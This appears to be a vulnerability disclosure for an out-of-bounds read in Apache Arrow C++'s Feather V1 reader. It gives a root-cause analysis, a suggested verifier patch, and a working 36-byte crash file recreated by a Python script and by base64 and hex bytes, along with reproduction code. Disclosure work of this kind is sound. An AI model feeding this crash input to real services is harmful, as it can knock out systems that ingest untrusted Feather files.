Out-of-bounds read in Apache Arrow C++ Feather V1 reader: feather::Reader::Open calls fbs::GetCTable with no flatbuffers::Verifier #50229

@OwenSanzas

Summary

Opening a crafted Feather V1 file through the public
arrow::ipc::feather::Reader::Open API triggers an AddressSanitizer
heap-buffer-overflow (out-of-bounds read) inside Arrow's legacy Feather V1
metadata parsing. The reader calls fbs::GetCTable on the trailing metadata
flatbuffer without first running a flatbuffers::Verifier, then
dereferences attacker-controlled offsets in ReaderV1::ReadSchema
(cpp/src/arrow/ipc/feather.cc:178) before any Status error can be returned.
A 36-byte file with the FEA1 magic and a corrupt footer triggers the crash
deterministically, so any service that ingests untrusted Feather V1 files can be
crashed (denial of service).

Tested at pinned commit 16fe34250a2ef261790b9cc414fdf0831669cf9f
(25.0.0-SNAPSHOT).

Root Cause

ReaderV1::Open reads the trailing metadata flatbuffer and obtains a typed view
of it via fbs::GetCTable(...). A flatbuffer obtained this way is untrusted:
its vtable, field offsets, and vector lengths are attacker-controlled bytes. The
flatbuffers contract requires a caller to run a flatbuffers::Verifier over the
buffer before touching any generated accessor; only verification guarantees that
every offset stays inside the buffer.

ReaderV1::Open skips that step. It goes straight from GetCTable to
ReadSchema(), which dereferences metadata_->columns() on the unverified
table. columns() is a flatbuffers GetPointer that reads the vtable and an
offset field; with a corrupt offset, flatbuffers::ReadScalar reads past the end
of the metadata buffer.
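
The arithmetic behind that out-of-bounds read can be sketched in a few lines of Python. This is an illustrative model, not Arrow or flatbuffers code: trace_accessor_reads is a hypothetical helper, and it relies only on the flatbuffers wire layout (a little-endian 32-bit root offset at the start of the buffer, then a signed 32-bit offset from the table back to its vtable, whose first 16 bits hold the vtable size). Instead of touching memory, it records which byte ranges an unchecked accessor would read and whether each one lies inside the buffer.

```python
import struct


def trace_accessor_reads(buf: bytes):
    """List the (label, start, end, in_bounds) reads an unchecked accessor would make.

    The trace stops at the first read that falls outside `buf`; C++ code
    without a verifier would perform that read anyway.
    """
    reads = []

    def read(label, fmt, pos):
        end = pos + struct.calcsize(fmt)
        ok = 0 <= pos and end <= len(buf)
        reads.append((label, pos, end, ok))
        return struct.unpack_from(fmt, buf, pos)[0] if ok else None

    root = read("root uoffset", "<I", 0)           # where the root table starts
    if root is None:
        return reads
    soffset = read("vtable soffset", "<i", root)   # table -> vtable back-reference
    if soffset is None:
        return reads
    read("vtable size", "<H", root - soffset)      # first field of the vtable
    return reads


# Empty metadata region (metadata_length = 0) and an attacker-chosen root offset.
for sample in (b"", b"\xff" * 8):
    print(trace_accessor_reads(sample))
```

For an empty metadata region, the very first read (the 4-byte root offset) is already outside the buffer; with 0xff bytes, the root offset itself is in bounds but points roughly 4 GiB past the start.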

Vulnerable code (cpp/src/arrow/ipc/feather.cc:172):

    metadata_ = fbs::GetCTable(metadata_buffer_->data());   // no flatbuffers::Verifier
    return ReadSchema();
  }

  Status ReadSchema() {
    std::vector<std::shared_ptr<Field>> fields;
    for (int i = 0; i < static_cast<int>(metadata_->columns()->size()); ++i) {  // line 178: deref unverified flatbuffer
      const fbs::Column* col = metadata_->columns()->Get(i);
      std::shared_ptr<DataType> type;
      RETURN_NOT_OK(
          GetDataType(col->values(), col->metadata_type(), col->metadata(), &type));
      fields.push_back(::arrow::field(col->name()->str(), type));
    }

Call chain (attacker bytes -> fault):

arrow::ipc::feather::Reader::Open          feather.cc:773 / :794  (public API)
  -> ReaderV1::Open                        feather.cc:173
       metadata_ = fbs::GetCTable(...)      feather.cc:172   <- NO flatbuffers::Verifier
     -> ReaderV1::ReadSchema               feather.cc:178
          metadata_->columns()->size()  -> fbs::CTable::columns()  feather_generated.h:698
            -> flatbuffers::Table::GetVTable
              -> flatbuffers::ReadScalar   base.h:440   <- OOB read

The metadata buffer is sized to the file's declared metadata_length; the
corrupt offset points past that region, so the accessor reads out of bounds.
Arrow's own threat model (docs/source/cpp/security.rst, "Ingesting untrusted
data") states the IPC reader APIs must return an arrow::Status error on
malformed input. The V1 reader violates that contract: it crashes before it can
return a Status.

PoC

A 36-byte malformed Feather V1 file: the FEA1 magic header, padding, a
metadata_length of 0, and the trailing FEA1 magic. Reader::Open selects
the legacy V1 path on the FEA1 magic, then GetCTable builds a table over an
empty/short metadata region and columns() reads out of bounds.

# generate_poc.py: re-create the shipped 36-byte crash input
poc = (b"FEA1"               # leading magic
       + b"\xff" * 24         # 24 filler bytes (the "padding" described above)
       + b"\x00\x00\x00\x00"  # metadata_length = 0
       + b"FEA1")             # trailing magic
assert len(poc) == 36
with open("poc.bin", "wb") as f:  # context manager closes the file deterministically
    f.write(poc)

Crash input size: 36 bytes (poc/poc.bin, md5 9d96bcc065b6672396fed18492792d03).
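
To make the framing of this input concrete, the sketch below locates the metadata region the way the description above implies. It is a simplified model under stated assumptions, not the Arrow implementation: locate_metadata, MAGIC and FOOTER_SIZE are hypothetical names, and the 8-byte footer (a little-endian uint32 metadata_length followed by the trailing magic) is inferred from the PoC layout and from the size - footer_size - metadata_length expression used by the reader.

```python
import struct

MAGIC = b"FEA1"
FOOTER_SIZE = 4 + len(MAGIC)  # assumed: uint32 metadata_length + trailing magic


def locate_metadata(data: bytes) -> tuple:
    """Return (offset, length) of the metadata region, or raise ValueError."""
    if len(data) < len(MAGIC) + FOOTER_SIZE:
        raise ValueError("file too small for Feather V1 framing")
    if data[:4] != MAGIC or data[-4:] != MAGIC:
        raise ValueError("missing FEA1 magic")
    # metadata_length sits immediately before the trailing magic.
    (metadata_length,) = struct.unpack_from("<I", data, len(data) - FOOTER_SIZE)
    offset = len(data) - FOOTER_SIZE - metadata_length
    if offset < len(MAGIC):
        raise ValueError("metadata_length exceeds file size")
    return offset, metadata_length


poc = b"FEA1" + b"\xff" * 24 + b"\x00\x00\x00\x00" + b"FEA1"
offset, length = locate_metadata(poc)
print(offset, length)
```

For the 36-byte input this yields offset 28 and length 0: the framing checks pass, yet the metadata region is empty, so there are no bytes for a flatbuffer root offset at all.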

Reproduction

Build Arrow C++ from source with -DARROW_IPC=ON and AddressSanitizer, then open
the attached Feather V1 file through the public reader API:

#include <arrow/ipc/feather.h>
#include <arrow/io/memory.h>
// auto buf = ...read poc.bin...;
auto source = std::make_shared<arrow::io::BufferReader>(buf);
std::shared_ptr<arrow::ipc::feather::Reader> reader;
auto st = arrow::ipc::feather::Reader::Open(source).Value(&reader);   // OOB read here

ReaderV1::Open assigns metadata_ = fbs::GetCTable(metadata_buffer_->data()) with
no flatbuffers::Verifier pass over the metadata, then ReadSchema() dereferences
metadata_->columns() on the unverified flatbuffer. AddressSanitizer reports:

AddressSanitizer: heap-buffer-overflow READ
  #0 flatbuffers::ReadScalar<...>            base.h
  #1 arrow::ipc::feather::fbs::CTable::columns()  feather_generated.h
  #2 ReaderV1::ReadSchema / ReaderV1::Open   ipc/feather.cc

The unverified GetCTable + columns() deref is still present in current master (cpp/src/arrow/ipc/feather.cc:172).
PoC: 36-byte .feather file (recreate from the base64 below).

Suggested Fix

Run a flatbuffers::Verifier over the metadata buffer before calling
fbs::GetCTable / dereferencing any accessor, returning Status::Invalid on
failure — matching how the V2/IPC reader rejects malformed metadata:

   ARROW_ASSIGN_OR_RAISE(metadata_buffer_,
                         source->ReadAt(size - footer_size - metadata_length,
                                        metadata_length, /*allow_short_read=*/false));

-  metadata_ = fbs::GetCTable(metadata_buffer_->data());
+  flatbuffers::Verifier verifier(metadata_buffer_->data(),
+                                 metadata_buffer_->size());
+  if (!fbs::VerifyCTableBuffer(verifier)) {
+    return Status::Invalid("Feather V1 metadata failed flatbuffer verification");
+  }
+  metadata_ = fbs::GetCTable(metadata_buffer_->data());
   return ReadSchema();

(The exact verifier symbol depends on the generated feather_generated.h; the
principle is "verify before accessing", and the precise call is the upstream
maintainer's judgement.)
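
The "verify before accessing" ordering can be shown in miniature with a Python model. This is a sketch under assumptions, not a substitute for flatbuffers::Verifier: verify_root_table and open_metadata are hypothetical names, and the check covers only the root offset, the vtable back-reference and the vtable size, whereas a real verifier also validates every field, vector and string. The point is the control flow: each offset is bounds-checked before it is followed, and a failure becomes an error value (the analogue of Status::Invalid) instead of a crash.

```python
import struct


def verify_root_table(buf: bytes):
    """Return None if the root table header is in bounds, else an error string."""
    size = len(buf)
    if size < 4:
        return "buffer too small for root offset"
    (root,) = struct.unpack_from("<I", buf, 0)
    if root + 4 > size:
        return "root table offset out of bounds"
    (soffset,) = struct.unpack_from("<i", buf, root)
    vtable = root - soffset
    if vtable < 0 or vtable + 4 > size:
        return "vtable offset out of bounds"
    (vtable_size,) = struct.unpack_from("<H", buf, vtable)
    if vtable_size < 4 or vtable + vtable_size > size:
        return "vtable size out of bounds"
    return None


def open_metadata(buf: bytes) -> str:
    """Verify first; only a verified buffer would be handed to accessors."""
    error = verify_root_table(buf)
    if error is not None:
        return "Invalid: " + error  # analogous to returning Status::Invalid
    return "OK"


print(open_metadata(b""))  # the empty metadata region from the PoC
```

With the PoC's empty metadata region, the first check fails and the caller receives an error string rather than performing any read.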

PoC bytes (self-contained)

The trigger input is 36 bytes (poc/poc.bin).
Recreate it exactly with:

base64 -d > poc.bin <<'B64'
RkVBMf///////////////////////////////wAAAABGRUEx
B64

Hex: 46454131ffffffffffffffffffffffffffffffffffffffffffffffff0000000046454131
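
As an optional sanity check, the three representations of the input (the generator expression, the base64 text and the hex dump) can be compared in Python. This is a convenience sketch, not part of the original report; the base64 and hex strings are rebuilt with repeat counts (31 slashes, 24 ff bytes) to avoid miscounting the long runs, on the assumption that they match the strings given above.

```python
import base64

# Same expression as the generator script.
generated = b"FEA1" + b"\xff" * 24 + b"\x00\x00\x00\x00" + b"FEA1"

# Base64 form: "RkVBMf", 31 slashes, then "wAAAABGRUEx".
from_base64 = base64.b64decode("RkVBMf" + "/" * 31 + "wAAAABGRUEx")

# Hex form: magic, 24 bytes of ff, zero metadata_length, magic.
from_hex = bytes.fromhex("46454131" + "ff" * 24 + "00000000" + "46454131")

assert generated == from_base64 == from_hex
assert len(generated) == 36
```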

Credit

Aisle Research (Ze Sheng (O2Lab & TAMU), Dmitrijs Trizna, Luigino Camastra, Guido Vranken).
